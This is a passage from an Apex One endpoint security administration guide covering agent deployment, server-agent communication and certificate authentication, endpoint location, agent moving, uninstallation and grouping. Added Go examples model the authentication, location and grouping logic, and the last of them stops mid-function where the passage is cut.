Microsoft System Center Configuration Manager or Active Directory Installation
A Security Agent MSI package created using the Agent Packager can be deployed using Microsoft
System Center Configuration Manager (SCCM) if you have Microsoft BackOffice installed on the
Server. The SCCM Server needs to obtain the MSI file from the Apex One Server before it can deploy
the package to target endpoints.

When Microsoft SCCM distributes the advertised program (that is, the Security Agent program) to
target endpoints, a screen displays on each target endpoint. Instruct users to click Yes and follow
the instructions provided by the wizard to install the Security Agent to their endpoints.

In addition, administrators can take advantage of Active Directory Group Policy features to deploy
the MSI package simultaneously to multiple Agent endpoints.

Agent Disk Images


Disk imaging technology allows you to create an image of the Security Agent using disk imaging
software and make clones of it on other computers on the network. Each Security Agent installation
needs a Globally Unique Identifier (GUID) so that the Server can identify Agents individually. Use the
Apex One program called ImgSetup.exe to create a different GUID for each of the clones.

Apex Central
The Security Agent Download page in the Apex Central Web Management console creates a Security
Agent installation packages for Apex One or Apex One (Mac). You can use this page to download and
install the Security Agent packages locally or to display a URL that you can send to users to install
the Security Agent directly on a target endpoint.

Note: Apex One must be registered as a Managed Server in Apex Central for the Security Agent
Download page to include the appropriate items.

Migrating From Other Endpoint Security Software


When you install the Security Agent on Windows, the installation program checks for any Trend Micro or
third-party endpoint security software installed on the target endpoint. The installation program can
automatically uninstall the software and replace it with the Security Agent.

For a list of endpoint security software that Apex One automatically uninstalls, open the tmuninst.ptn
and tmuninst_as.ptn files in the ...\PCCSRV\Admin folder using a text editor such as Notepad.

If the software on the target endpoint is not included in the list, manually uninstall it first. Depending on
the uninstallation process of the software, the endpoint may or may not need to restart after
uninstallation.

tmuninst_as.ptn
The tmuninst_as.ptn file contains uninstallation commands for Trend Micro security software
that must be removed from the endpoint before installing the Security Agent. If an entry in the file
exists for an application, the setup routine will be able to uninstall the application automatically.

tmuninst.ptn
The tmuninst.ptn file contains uninstallation commands for third-party security software that
must be removed from the endpoint before installing the Security Agent. If an entry in the file exists
for an application, the setup routine will be able to uninstall the application automatically. If the
application currently installed on the endpoint does not contain an entry in this file, the application
must be manually removed through Control Panel before proceeding with the Agent setup.

Coexist Mode
Though it is not a recommended implementation, the Apex One Security Agent can be installed on
endpoints in Coexist Mode. This mode allows third-party anti-malware products to be used on the
same endpoint as the Apex One Security Agent. In this implementation, Apex One provides some
security features, like Application Control and Vulnerability Protection, while making use of the
malware scanning capabilities of the other application.

Anti-malware applications tested in co-exist mode include the following:


• Symantec Endpoint Protection 14
• Sophos Endpoint Security 10.6
• Kaspersky Security Center 10
• McAfee Endpoint Security 10.5
• Microsoft Defender / Microsoft Security Essentials

In Coexist Mode, Security Agents do not report their status to Windows Security Center, so that the
third-party product remains the registered antivirus and keeps running.

It is possible to upgrade Agents installed in Coexist Mode to full functionality through Apex Central.
This process will also uninstall any non-Microsoft third-party security applications.

In Apex Central, create and deploy a policy to the Security Agent including the Privileges and Other
Settings value of Permanently Convert Security Agents using coexist mode into fully-functional
Security Agents.

Post Installation Tasks


Once the Security Agent is installed on the endpoint, the following tasks can be attempted to confirm its
operation and update it to use the current malware patterns.

Component Updates
Update the Security Agent components to ensure that Agents have the most up-to-date protection
against security risks. You can run manual Agent updates from the Web Management console or
instruct users to run Update Now from their computers.

Test Scan using EICAR Test Script


The European Institute for Computer Antivirus Research (EICAR) developed the EICAR test script as
a safe way to confirm proper installation and configuration of antivirus software. The EICAR web site
is available at:
http://www.eicar.org

Installation Logs
The Security Agent installation log (ofcnt.log) is written to %windir% for all installation methods
except the MSI package; for MSI package installations it is written to %temp%.

Agent-To-Server Communication
Agents communicate with their Server by sending HTTPS messages to the Web Server on the Apex One
Server and calling ISAPI/CGI commands. These commands invoke certain actions on the Server, and the
Server sends a corresponding answer to the Agent's request. These messages can be sent to the Server
as a response to a Server notification. In doing so, the Agent also passes information about itself, for
example its UID, computer name and program version. These calls are processed by the Agent command
handler, which checks that the Agent information is correct, complete and valid. If it is, the Server points
the Agent to the location from which to download the relevant files; otherwise, the Server returns an
error code to the Agent. You can configure Apex One to ensure that all communication between the
Server and Agents is valid: Apex One provides public-key cryptography and enhanced encryption
features to protect all communication between the Server and Agents.

[Figure: Agent-to-Server communication. The Security Agent sends HTTPS requests to IIS on the Apex One Server (IUSR_{servername} Internet Guest account); IIS passes the ISAPI/CGI calls to the Apex One Master Service.]

Agent-to-Server (IIS) communication is performed using the IUSR_{servername} account (Internet
Guest). This user account is essential for Apex One to function properly, so it must exist on the Server
and have the proper privileges (for example, the privilege to run ISAPIs).

Web Server logs can be a useful source of troubleshooting information. In addition, to verify Agent-to-
Server communication, enter the following URL in Internet Explorer:
https://<apexone_server>:port/officescan/cgi/cgionstart.exe

If the number -2 appears in the browser, the Agent is able to communicate with the Server.

Note: Apex One moves the communication between Agents and the Server to HTTPS. As a result, the
communication port on the Server also changes from the HTTP port (default 8080) to the
HTTPS port (the same port as the Web Management console, default 4343).

Some environments may encounter HTTPS communication issues for various reasons (for
example, inconsistent SSL/TLS environments or firewalls blocking the HTTPS port). This can
result in Agents showing as offline, failing to upgrade, and not uploading logs or quarantined files.

Using HTTPS also creates the need for certificates and certificate validation. All Apex One Security
Agents have their own self-signed certificate they use for communication and verification with the Apex
One Server. This can be a problem in environments that deploy HTTPS Inspection gateways. With HTTPS
Inspection, the Security Gateway can inspect the traffic that is encrypted by HTTPS.

The Security Gateway uses certificates and becomes an intermediary between the client computer and
the secure website. This causes a problem as Apex One will not trust the Security Gateway’s certificate.
Thus, Apex One traffic must be excluded from HTTPS Inspection on Security Gateway products.

In some instances, for compatibility or network inspection purposes, traffic can be reverted to HTTP.

Server-to-Agent Communication
When the Server initiates the action, it sends a TCP message to the Agent at the Agent port stored in the
database. Note that Agent communication ports are randomly generated during setup. The
administrator can still modify this randomly generated port if necessary during setup. The
communication from Apex One Server to Agent (and vice-versa) is event driven. When specific events
occur on the Agent or on the Server, an action may be triggered.

Server-to-Agent communication is a four-step process. A simplified representation of how Apex One
Servers and Agents communicate is illustrated here:
1 Notification: In this phase, the Apex One Server notifies the Security Agent to retrieve
instructions from the Apex One Server.

[Figure: step 1. The Apex One Server (Apex One Master Service, ISAPI/CGI behind IIS running as IUSR_{servername} Internet Guest account) sends a TCP notification to the Apex One Agent.]

2 Call ISAPI/CGI: The Security Agent, specifically its TMListener component, responds to the
notification in the previous phase by calling ISAPI/CGI applications on the Server. This phase
actually involves calls to multiple ISAPI/CGI applications. The applications called depend on the
type of command.

[Figure: step 2. The Agent calls ISAPI/CGI on the Server over HTTPS through IIS (IUSR_{servername} Internet Guest account) to the Master Service; the original figure still labels the products OfficeScan Agent and OfficeScan XG Server.]

3 Server-side processing: The ISAPI/CGI applications on the Server retrieve settings from the
relevant Apex One information storage areas (for example, ofcscan.ini, Apex One database).

[Figure: step 3. The ISAPI/CGI applications on the Apex One Server (IIS, IUSR_{servername} Internet Guest account, Apex One Master Service) retrieve the requested settings while the HTTPS call from the Apex One Agent is pending.]

4 Response: The Agent receives the required response from the ISAPI/CGI.

[Figure: step 4. The response from the ISAPI/CGI on the Apex One Server (IIS, IUSR_{servername} Internet Guest account, Apex One Master Service) is returned to the Apex One Agent over HTTPS.]

To optimize communication performance, the administrator can modify ofcscan.ini. The parameters
related to Server performance are in the [INI_SERVER_SECTION]. Some of these parameters can also
be reconfigured easily using the Server Tuner (SvrTune.exe), located in the following folder on the Server:
…\PCCSRV\Admin\Utility

Authenticating Server-Initiated Communications


Apex One uses two methods for authenticating Server-initiated communications:
• Notification Authentication: The Apex One Server signs the notification message before
sending it out to the Agents. The Agent will accept or reject the notification depending on
the results of the signature verification.
• Data Authentication: Data from the Apex One Server is authenticated and filtered by the
Security Agent using a hash checking mechanism.

Notification Authentication

Apex One uses public-key cryptography to authenticate notifications from the Apex One Server
to Security Agents. With public-key cryptography, the Server keeps a private key and deploys a
public key certificate to all Agents. The Agents use the public key in the certificate to verify that
incoming notifications are from the Apex One Server and they are valid. The Agents respond or
carry out the instructions if the verification is successful.

Note: The Apex One Server does not authenticate communications from Security Agents.

During installation of the Apex One Server, the setup stores the public key certificate in the host
computer's certificate store. Use the Authentication Certificate Manager tool to manage Trend
Micro certificates and keys.

Before reinstalling the Apex One Server, ensure that you back up the existing certificate. After
the new installation completes, import the backed up certificate to allow communication
authentication between the Apex One Server and Security Agents to continue uninterrupted. If
you create a new certificate during Server installation, Security Agents cannot authenticate
Server communication because they are still using the old certificate (which no longer exists).

Data Authentication

Apex One uses the same keys and certificates for Data Authentication as it does for Notification
Authentication. There are three types of data that the Agents may receive:
• CGI/ISAPI: When invoking a CGI or ISAPI, the Agent sends the serial number and issuer of the
Certificate it has, plus a random salt value. The Server then appends the salt value to the
result of the CGI/ISAPI and uses the private key associated with the Certificate to sign it. The
Agent will then verify the signature with the Certificate and check the salt value before
accepting the result.
If there is no issuer or serial number, the Server simply returns the content without
providing any signature. If there is an issuer and a serial number but the Server does not
have that Certificate, an HTTP 404 error is returned.
• Program files: When downloading a program file, the Agent creates an MD5 hash of the file
and compares it to a hotfix table which has been downloaded at an earlier time and validated
using the Static files authentication process.
• Static files: When downloading a static file, the Agent also downloads a signature file. The
signature file has been created by the Apex One Server by taking a SHA-1 hash of the file,
then signing this with each of the Server's private keys. Also included in the file is the
Certificate serial number and issuer for the Certificates associated with each of those
private keys. The Agent then verifies the appropriate signature with the Certificate it holds.
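
The CGI/ISAPI exchange described above, modelled as an added example that is not Trend Micro's code: the Agent presents its certificate issuer and serial plus a salt, the Server appends the salt to the result and signs it, and the Agent verifies the signature and the salt before accepting anything. The types, the salt layout and the use of RSA PKCS#1 v1.5 over SHA-1 for the CGI result are assumptions of the example; the page names SHA-1 only for static files and does not describe the signature format.

```go
package main

import (
	"bytes"
	"crypto"
	"crypto/rand"
	"crypto/rsa"
	"crypto/sha1"
	"errors"
	"fmt"
)

// ServerCert is one Server authentication certificate with its private key,
// identified the way the Agent does it: by issuer and serial (hypothetical).
type ServerCert struct {
	Issuer, Serial string
	Key            *rsa.PrivateKey
}

// NewServerCert generates the key pair (the page's minimum is 1024 bits).
func NewServerCert(issuer, serial string, bits int) (*ServerCert, error) {
	key, err := rsa.GenerateKey(rand.Reader, bits)
	if err != nil {
		return nil, err
	}
	return &ServerCert{Issuer: issuer, Serial: serial, Key: key}, nil
}

// Server holds the certificates it deployed; Agent holds one public key cert.
type Server struct{ Certs []*ServerCert }
type Agent struct {
	Issuer, Serial string
	Pub            *rsa.PublicKey
}

// CGIResponse is the Server's answer to a CGI/ISAPI call.
type CGIResponse struct {
	Status    int    // 200 with content, 404 when the certificate is unknown
	Content   []byte // CGI result with the Agent's salt appended
	Signature []byte // empty when the Agent sent no issuer/serial
}

// RSA PKCS#1 v1.5 over SHA-1, the digest the page names for static files.
func signSHA1(key *rsa.PrivateKey, data []byte) ([]byte, error) {
	d := sha1.Sum(data)
	return rsa.SignPKCS1v15(rand.Reader, key, crypto.SHA1, d[:])
}

func verifySHA1(pub *rsa.PublicKey, data, sig []byte) error {
	d := sha1.Sum(data)
	return rsa.VerifyPKCS1v15(pub, crypto.SHA1, d[:], sig)
}

// HandleCGI is the Server side: no issuer/serial means unsigned content, an
// unknown certificate means 404, otherwise the salt is appended and signed.
func (s *Server) HandleCGI(issuer, serial string, salt, result []byte) CGIResponse {
	if issuer == "" || serial == "" {
		return CGIResponse{Status: 200, Content: result}
	}
	for _, c := range s.Certs {
		if c.Issuer != issuer || c.Serial != serial {
			continue
		}
		salted := append(append([]byte{}, result...), salt...)
		sig, err := signSHA1(c.Key, salted)
		if err != nil {
			return CGIResponse{Status: 500}
		}
		return CGIResponse{Status: 200, Content: salted, Signature: sig}
	}
	return CGIResponse{Status: 404}
}

// VerifyCGI is the Agent side: the signature must verify with the held cert
// and the salt must be this request's, so a captured answer cannot be replayed.
func (a *Agent) VerifyCGI(resp CGIResponse, salt []byte) ([]byte, error) {
	if resp.Status != 200 {
		return nil, fmt.Errorf("server returned HTTP %d", resp.Status)
	}
	if len(resp.Signature) == 0 || verifySHA1(a.Pub, resp.Content, resp.Signature) != nil {
		return nil, errors.New("missing or invalid signature")
	}
	n := len(resp.Content) - len(salt)
	if n < 0 || !bytes.Equal(resp.Content[n:], salt) {
		return nil, errors.New("salt mismatch")
	}
	return resp.Content[:n], nil // the CGI result without the salt
}

func main() {
	c, _ := NewServerCert("CN=Example Apex One CA", "01", 1024) // constructed; error ignored in the demo
	srv := &Server{Certs: []*ServerCert{c}}
	agent := &Agent{Issuer: c.Issuer, Serial: c.Serial, Pub: &c.Key.PublicKey}
	salt := []byte("salt-0001") // constructed; a real Agent sends random bytes
	resp := srv.HandleCGI(agent.Issuer, agent.Serial, salt, []byte("cgi result"))
	result, err := agent.VerifyCGI(resp, salt)
	fmt.Printf("accepted=%q err=%v\n", result, err)
}
```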

Support for third-party certificates


Apex One supports third-party signed authentication certificates, provided the following requirements are met:
• The import file must be in PFX format, which contains only one certificate
• The certificate must contain a signed key
• It must use either of the following algorithms:
- Microsoft Enhanced Cryptographic Provider v1.0
- Microsoft Enhanced DSS and Diffie-Hellman Cryptographic Provider
• The minimum key length of the certificate must be 1024 bits

Using a Single Key With Multiple Apex One Servers


When deciding on whether to use a single authentication key across all Apex One Servers, take note
of the following:
• Implementing a single authentication key is a common practice for standard levels of
security. This approach balances the security level of your organization with the overhead
associated with maintaining multiple keys.
• Implementing multiple authentication keys across Apex One Servers provides a maximum
level of security. This approach increases the maintenance required when certificates expire
and need to be redistributed across the Servers and Agents.
Before reinstalling the Apex One Server, ensure that you back up the existing key and
certificate. After the new installation completes, import the backed-up key and certificate to
allow communication authentication between the Apex One Server and Security Agents to
continue uninterrupted. If you create a new certificate during Server installation, Security
Agents cannot authenticate Server communication because they would still be using the old
certificate.

Heartbeat
Heartbeats are real-time messages that Agents send to the Server over HTTP/TCP to indicate that the
connection from the Agent remains functional. This addresses the issue of Agents in unreachable networks
always appearing as offline even when they can connect to the Server, for example, when behind a NAT
firewall.

If the Server does not receive a heartbeat, it does not immediately treat the Agent as offline. The
heartbeat settings control how long the Server waits before changing an Agent's status to offline or
unreachable/offline.

The Agent heartbeat status records both the previous and the current heartbeat sending status. By
comparing the two values, the status handler can tell whether an Agent's status has changed and update
only the Agents whose status has changed, instead of all unreachable Agents.

To configure the heartbeat period, click Agents > Global Agent Settings. In the Unreachable Networks
section, enable the option that allows Agents to send heartbeats and set the time period.

Server Polling
Server polling is independent of the heartbeat feature: it is the Agent's polling of the Server for updated
settings and components. The polling command from Agent to Server is treated as another form of
heartbeat.

Agent Connection Status


The Security Agent connection status depends on the way in which the Apex One Server communicates
with the Security Agent. The different connection statuses available for the Security Agent include:

Online
The Security Agent can connect to the Apex One Server for bi-directional communication of the
following:
• Policy settings
• Updates
• Scan commands
• Suspicious Object list synchronization
• Sample submission
• Log submission

Offline
The Security Agent has no functional connection with the Apex One Server or an Edge Relay Server.

Independent
The Security Agent can connect to the on-premise Apex One Server but communication is limited.
While in Independent mode:
• The Security Agent does not accept policy settings from the Server
• The Security Agent does not initiate scan commands from the Server
• The Security Agent does not send logs to the Server

You can configure Independent Agents with privileges to allow or block component updates if a
functional connection to the Apex One Server is available.

End users can manually initiate scans and updates on Agents in Independent mode.

Off-premises
The Security Agent is outside of the corporate network and cannot connect to the on-premise Apex
One Server directly. The Security Agent can, however, connect to an Edge Relay Server for the
following:
• Suspicious Object list synchronization
• Sample submission
• Log submission

The Connection Status for an off-premises Agent displays as Offline in the Agent tree because the
Apex One Server has no direct connection with the Security Agent.

Endpoint Location
One of the ways the Security Agent determines which policy or profile to use is by checking its
connection status with the Apex One Server. If an internal Security Agent (or any Agent within the
corporate network) cannot connect to the Server, the Agent status becomes offline. The Agent then
applies a policy or profile intended for external Agents. Endpoint location helps address this issue.

Policies and profiles managed by Reference Servers include:


• Firewall profiles
• Web reputation policies
• Data Protection policies
• Device Control policies
• Smart Scan

Reference Server List


Any Security Agent that loses connection with the Apex One Server will try connecting to Reference
Servers using Telnet on a specified port. If the Agent successfully establishes connection with the
Reference Server, it applies the policy or profile for internal Agents.

Security Agents connect to the first Reference Server on the list. If connection cannot be
established, the Agent tries connecting to the next Server on the list.

Assign computers with Server capabilities, such as a Web Server, SQL Server, or FTP Server as
Reference Servers. You can specify a maximum of 320 Reference Servers. Security Agents use
Reference Servers when determining the antivirus, behavior monitoring, device control, firewall
profiles, web reputation policy or data protection settings to use.

Note: Reference Servers do not manage Agents or deploy updates and Agent settings. The Apex One
Server performs these tasks.

In the Apex One Web Management console, click Agents > Endpoint Location and click Edit the
Reference Servers list. Click Enable the reference server list and click Add to add any Reference
Servers by identifying the IP address, endpoint name or FQDN along with the port number.

Gateways
Alternately, Gateway IP addresses or MAC addresses can be used for endpoint location. Type the IP
address of the Gateway and optionally, the MAC address and click Add. Multiple Gateway addresses
can be added. The Gateway Setting Importer (GSImporter.exe) tool can be used to import a list of
gateway IP addresses from a text file.

Excluding VPN Connections


An enhancement for location awareness in Apex One will check the network adapter used to
connect to the reference host and identify if the endpoint is internal or external.

Previously, when an external Security Agent connected to the Apex One Server using a VPN
connection, it was treated as an internal Agent and the internal policy settings were applied.
VPN clients (Cisco, F5, Fortigate…) create a virtual network adapter as the network device used
to communicate with the target network.

In Apex One, a new setting called Exclude agents using VPN or PPP dial-up connections is
available. When it is enabled, Security Agents connected to the Server using a VPN connection
will be identified as an external Agent and apply corresponding configurations.
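
How the location checks described in the Endpoint Location sections fit together, as an added example that is not Trend Micro's code: the Apex One Server and then each Reference Server are probed in list order, the VPN/PPP exclusion turns an answer reached through a tunnel adapter into an external verdict, and Gateway IP/MAC matching is the alternative method. The Host, Gateway and Probe types are assumptions of the example, and classifying an adapter by its point-to-point flag is a stand-in for the Agent's own adapter check, not a description of it.

```go
package main

import (
	"fmt"
	"net"
	"strings"
	"time"
)

// Location is the outcome of the endpoint location check; it decides whether
// the Agent applies the internal or the external policies and profiles.
type Location string

const (
	Internal Location = "internal"
	External Location = "external"
)

// Host is the Apex One Server or one Reference Server list entry: an IP
// address, endpoint name or FQDN plus the port the Agent connects to.
type Host struct {
	Name string
	Port int
}

// Probe attempts a TCP connection to host:port and reports whether it
// succeeded and whether it left through a VPN or PPP dial-up adapter. It is a
// function value so the decision logic can be exercised offline (hypothetical).
type Probe func(host string, port int) (viaVPN bool, ok bool)

// TCPProbe is a live probe. Go's standard library has no "is a VPN adapter"
// flag, so the point-to-point interface flag stands in for tunnel adapters;
// that is an assumption of this example, not how the Agent classifies them.
func TCPProbe(timeout time.Duration) Probe {
	return func(host string, port int) (bool, bool) {
		conn, err := net.DialTimeout("tcp", net.JoinHostPort(host, fmt.Sprint(port)), timeout)
		if err != nil {
			return false, false
		}
		defer conn.Close()
		local := conn.LocalAddr().(*net.TCPAddr).IP
		ifaces, _ := net.Interfaces()
		for _, ifc := range ifaces {
			addrs, _ := ifc.Addrs()
			for _, a := range addrs {
				if n, isNet := a.(*net.IPNet); isNet && n.IP.Equal(local) {
					return ifc.Flags&net.FlagPointToPoint != 0, true
				}
			}
		}
		return false, true
	}
}

// Locate follows the page's procedure: the Apex One Server is tried first, then
// each Reference Server in list order, and the first host that answers decides.
// With excludeVPN set ("Exclude agents using VPN or PPP dial-up connections"),
// an answer reached through a VPN/PPP adapter makes the endpoint external.
func Locate(server Host, refs []Host, probe Probe, excludeVPN bool) Location {
	for _, h := range append([]Host{server}, refs...) {
		viaVPN, ok := probe(h.Name, h.Port)
		if !ok {
			continue // try the next host on the list
		}
		if excludeVPN && viaVPN {
			return External
		}
		return Internal
	}
	return External // nothing answered
}

// Gateway is one configured Gateway entry: an IP address and an optional MAC.
type Gateway struct {
	IP  string
	MAC string // empty matches any MAC address
}

// LocateByGateway is the alternative method: the endpoint is internal when its
// current default gateway matches a configured entry (MAC compared
// case-insensitively when one is configured).
func LocateByGateway(configured []Gateway, gwIP, gwMAC string) Location {
	for _, g := range configured {
		if g.IP == gwIP && (g.MAC == "" || strings.EqualFold(g.MAC, gwMAC)) {
			return Internal
		}
	}
	return External
}

func main() {
	// Constructed hosts and addresses; none of these are real systems.
	server := Host{"apexone.corp.example", 4343}
	refs := []Host{{"web01.corp.example", 80}, {"sql01.corp.example", 1433}}
	fmt.Println("location:", Locate(server, refs, TCPProbe(2*time.Second), true))
	gws := []Gateway{{"192.0.2.1", "00-00-5E-00-53-01"}}
	fmt.Println("by gateway:", LocateByGateway(gws, "192.0.2.1", "00-00-5e-00-53-01"))
}
```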

Moving Agents Between Apex One Servers


If you have more than one Apex One Server on the network, you can transfer existing Security Agents
from one Apex One Server to another.

In the Apex One Web Management console, click Agents > Agent Management. Select the Security Agent
to move and click Manage Agent Tree > Move Agent. Identify the details of the Apex One Server to move
the Agent to.

Agent Mover Tool


The Agent Mover tool (IpXfer.exe) can also be used to transfer Security Agents from one Apex
One Server to another. Its commands can be used within scripts to move Agents, or when Agents do
not move properly through the Web Management console. This tool is for moving Agents only; it does
not uninstall or remove Agents from Apex One.

Note: Both Apex One Servers must be using the same language version. Also, if you use Agent
Mover to move a Security Agent running an earlier version of Apex One to a Server that is
running the current version, the Security Agent is upgraded automatically.

1 On the source Apex One Server, locate the following folder and copy the file IpXfer.exe to the
Security Agent endpoint:
...\PCCSRV\Admin\Utility\IpXfer
If the Security Agent endpoint runs on 64-bit platform, copy IpXfer_x64.exe instead.
2 On the Security Agent endpoint, open a command prompt window and run IpXfer.exe with the
following syntax:
IpXfer -s <server_name> -p <server_HTTP_listening_port>|-sp <server_HTTPS_listening_port> -c <agent_listening_port> -d <domain_or_domain_hierarchy> -e <Certificate_location_and_file_name> -pwd <agent_unload_and_unlock_privilege_password>

Example:
IpXfer_x64.exe -s Server01 -p 8080 -sp 4343 -c 21112 -d Workgroup -pwd unlock

Parameter                                 Description
<executable file name>                    IpXfer.exe or IpXfer_x64.exe
-s <server_name>                          The name of the destination Apex One Server.
-p <HTTP_server_listening_port>           The HTTP listening port (or trusted port) of the destination
                                          Apex One Server. To view the listening port on the Apex One
                                          Web Management console, click Administration > Settings >
                                          Agent Connection.
-sp <HTTPS_server_listening_port>         The HTTPS listening port (or trusted port) of the destination
                                          Apex One Server.
-c <Agent_listening_port>                 The port number used by the Security Agent endpoint to
                                          communicate with the Server.
-d <domain_or_domain_hierarchy>           The Agent tree domain or group to which the Agent will be
                                          grouped.
-e <Certificate_location_and_file_name>   Imports a new authentication certificate for the Security
                                          Agent during the move process. If this parameter is not used,
                                          the Security Agent automatically retrieves the current
                                          authentication certificate from its new managing Server.
                                          NOTE: The default certificate location on the Apex One Server
                                          is ...\PCCSRV\Pccnt\Common\OfcNTCer.dat. When using a
                                          certificate from a source other than Apex One, ensure that
                                          the certificate is in Distinguished Encoding Rules (DER)
                                          format.
-pwd <Agent_unload_and_unlock_privilege_password>
                                          The unload and unlock privilege password configured in
                                          Privileges and Other Settings. If the unload and unlock
                                          password is required and you do not provide the password,
                                          Agent Mover prompts you before attempting to move Agents.
3 To confirm whether the Security Agent is now reporting to the new Server:
• Go to the Security Agent endpoint.
• Right-click the Security Agent program icon in the system tray.
• Click Component Versions.
• Verify the Apex One Server that the Security Agent reports to by examining the Server
name/port field.

Note: If the Security Agent does not appear in the Agent tree of the new Apex One Server managing it,
try restarting the Master Service (ofservice.exe) on the destination Apex One Server.

Uninstalling Security Agents


Security Agents can be uninstalled from an endpoint computer using one of the following methods.

Uninstalling From the Web Management Console


On the Agent Management menu, locate the endpoints from which the Agent will be uninstalled and
click Tasks > Agent Uninstallation.

Uninstalling from Windows Control Panel


Users must be granted the privilege to uninstall the Security Agent program. Depending on your
installation, users may be required to enter a password to perform the uninstall. If a password is
required, share it only with users who will run the uninstallation program, and change the password
immediately if it has been compromised.

In Windows Control Panel, select Add or Remove Programs. Locate Trend Micro Security Agent and
click Change. Follow the prompts to uninstall the Agent. If required, authorization must be provided
to complete the removal. The password for uninstalling the Agent was provided as part of the Apex
One Server setup process.

Uninstalling Manually
If any problems are encountered using the above methods to uninstall the Security Agent, you can
manually uninstall the Security Agent from a computer using the process described in the following
article:
https://success.trendmicro.com/solution/1039283-uninstalling-clients-or-Agents-in-officescan-osce

Custom Uninstall Tool


If it is not possible to reinstall an Agent because there are still program entries in the Registry, Trend
Micro Support can provide you with the Custom Uninstall Tool (CUT Tool). This time-limited tool
removes all trace of Apex One Security Agents from an endpoint.

Removing Inactive Agents


When you use the Security Agent uninstallation program to remove the Security Agent program from
endpoints, the program automatically notifies the Server. When the Server receives this notification, it
removes the Security Agent icon in the Agent tree to show that the Agent does not exist anymore.

However, if you use other methods to remove the Security Agent, such as reformatting the endpoint
hard drive or deleting the Security Agent files manually, Apex One will not be aware of the removal and it
will display the Security Agent as offline. If a user unloads or disables the Security Agent for an extended
period of time, the Server also displays the Security Agent as offline.

To have the Agent tree display active Agents only, configure Apex One to automatically remove inactive
Agents from the Agent tree.

In the Apex One Web Management console, click Administration > Settings > Inactive Agents. Click Enable
automatic removal of inactive Agents and select how many days should pass before Apex One considers
the Security Agent inactive.

Security Agent Settings


Apex One administrators have the flexibility to apply security settings either to individual Agents or
groups of Agents.

Root Settings
Settings at this control point define the global default. This is the only control point with the option
to either overwrite all existing settings or define the settings for all future domains. Settings at this
level are stored in the ofcscan.ini.

Domain Settings
These settings apply to all Agents in a particular domain. Agents automatically adopt domain
settings when they join a domain. Settings at this level are stored in the Apex One Database.

Agent Settings
Changes made at this control point apply to individual Agents. This allows administrators to
customize settings for specific desktops. Settings at this level are stored in the Apex One Database.

Best Practice: Confusion can arise if settings are applied to many different endpoint computers at
the Agent level. It is recommended that a new domain be created to assign settings to
specific endpoints, instead of assigning them directly to the endpoints.

Agent Grouping
Agents in Apex One can be grouped to share the same configuration and run the same tasks. By
grouping Agents into groups (referred to in OfficeScan as domains), you can configure, manage, and
apply the same configuration to all domain members. There are two Agent grouping methods:
manual and automatic.

Manual Grouping
An Apex One Server uses this setting only during fresh Agent installations.

The installation program checks the network domain to which a target endpoint belongs. If the
domain name already exists in the Agent tree, Apex One groups the Agent on the target endpoint
under that domain and will apply the settings configured for the domain. If the domain name does
not exist, Apex One adds the domain to the Agent tree, groups the Agent under that domain, and
then applies the root settings to the domain and Agent.

Once the Agent appears in the Agent tree, it can be manually moved to another domain or to
another Apex One Server. Manual Agent grouping includes the creation, management, and removal
of domains in the Agent tree.

Manual Agent grouping defines the domain to which a newly installed Agent should belong, for
example NetBIOS domain, Active Directory domain or DNS domain.

Automatic Grouping
Automatic (or Custom) grouping uses rules to sort Agents in the Agent tree. Once the rules are in
place, Agents can be sorted manually or automatically into custom Agent groups when specific
events occur or at scheduled intervals.

Automatic Agent grouping uses rules defined by IP addresses or Active Directory domains. If a rule
defines an IP address or an IP address range, the Apex One Server will group Agents with a matching
IP address to a specific domain in the Agent tree. Similarly, if a rule defines one or several Active
Directory domains, the Apex One Server will group Agents belonging to a particular Active Directory
domain to a specific domain in the Agent tree.

The Apex One Server groups Agents accordingly when the following events are triggered:
• The Agent registers to the Server for the first time
• The Agent connection status changes from offline to online
• The Agent IP address changes
• The Agent reloads

Grouping may also be done using the Sort Client command.

Note: If Agents match multiple rules during the grouping operation, the first matched rule will be
applied. If no rules are matched during the grouping operation, the Agents are placed into a
group called Default.
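
The rule evaluation described above (IP address or range rules and Active Directory domain rules, first matching rule wins, Default otherwise), as an added example that is not Trend Micro's code. The AgentInfo and GroupingRule types, the accepted range syntaxes and the IPv4-only limit are assumptions of the example; the Server stores its real rules in SortingRule.xml, whose format is not shown here.

```go
package main

import (
	"bytes"
	"fmt"
	"net"
	"strings"
)

// AgentInfo is what the grouping step knows about an Agent (hypothetical type).
type AgentInfo struct {
	Name     string
	IP       net.IP
	ADDomain string // empty when the endpoint is not domain-joined
}

type ipRange struct{ first, last net.IP } // inclusive IPv4 range

// GroupingRule sorts matching Agents into the Agent tree domain Target. As on
// the Agent Grouping page, a rule is defined by IP addresses or by AD domains.
type GroupingRule struct {
	Target    string
	IPRanges  []ipRange
	ADDomains []string
}

// NewIPRule builds a rule from single addresses ("192.0.2.10"), dashed ranges
// ("192.0.2.10-192.0.2.20") or CIDR blocks ("10.1.0.0/16"); IPv4 only.
func NewIPRule(target string, specs ...string) (GroupingRule, error) {
	r := GroupingRule{Target: target}
	for _, s := range specs {
		rng, err := parseRange(s)
		if err != nil {
			return GroupingRule{}, fmt.Errorf("rule %q: %w", target, err)
		}
		r.IPRanges = append(r.IPRanges, rng)
	}
	return r, nil
}

func parseRange(s string) (ipRange, error) {
	if _, n, err := net.ParseCIDR(s); err == nil {
		first := n.IP.To4()
		if first == nil || len(n.Mask) != net.IPv4len {
			return ipRange{}, fmt.Errorf("IPv4 CIDR expected: %q", s)
		}
		last := make(net.IP, net.IPv4len)
		for i := range first {
			last[i] = first[i] | ^n.Mask[i] // set every host bit
		}
		return ipRange{first, last}, nil
	}
	lo, hi, found := strings.Cut(s, "-")
	if !found {
		hi = lo // a single address is a range of one
	}
	first, last := net.ParseIP(strings.TrimSpace(lo)).To4(), net.ParseIP(strings.TrimSpace(hi)).To4()
	if first == nil || last == nil || bytes.Compare(first, last) > 0 {
		return ipRange{}, fmt.Errorf("bad IPv4 address or range %q", s)
	}
	return ipRange{first, last}, nil
}

// Match reports whether the Agent satisfies any criterion of the rule.
func (r GroupingRule) Match(a AgentInfo) bool {
	if ip4 := a.IP.To4(); ip4 != nil {
		for _, rng := range r.IPRanges {
			if bytes.Compare(ip4, rng.first) >= 0 && bytes.Compare(ip4, rng.last) <= 0 {
				return true
			}
		}
	}
	for _, d := range r.ADDomains {
		if a.ADDomain != "" && strings.EqualFold(d, a.ADDomain) {
			return true
		}
	}
	return false
}

// Group evaluates the rules in list order: the first matching rule wins, and an
// Agent that matches no rule is placed in the Default group.
func Group(rules []GroupingRule, a AgentInfo) string {
	for _, r := range rules {
		if r.Match(a) {
			return r.Target
		}
	}
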